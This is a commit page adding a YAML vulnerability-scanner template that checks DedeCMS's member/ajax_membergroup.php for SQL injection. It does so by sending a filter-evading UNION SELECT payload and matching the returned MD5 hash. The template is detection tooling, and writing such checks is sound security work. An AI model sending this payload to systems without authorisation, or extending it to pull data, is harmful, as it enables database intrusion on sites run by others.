Merge pull request #1083 from pikpikcu/patch-123

Create dedecms-membergroup-sqli
patch-1
Prince Chaddha 2021-07-26 18:02:27 +05:30 committed by GitHub
commit 833ae4ae48
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 25 additions and 0 deletions

View File

@ -0,0 +1,25 @@
id: dedecms-membergroup-sqli
info:
name: DedeCMS Membergroup SQLI
author: pikpikcu
severity: medium
reference: http://www.dedeyuan.com/xueyuan/wenti/1244.html
tags: sqli,dedecms
requests:
- method: GET
path:
- "{{BaseURL}}/member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5(999999)+--+@`'`"
matchers-condition: and
matchers:
- type: word
words:
- "52c69e3a57331081823331c4e69d3f2e"
part: body
- type: status
status:
- 200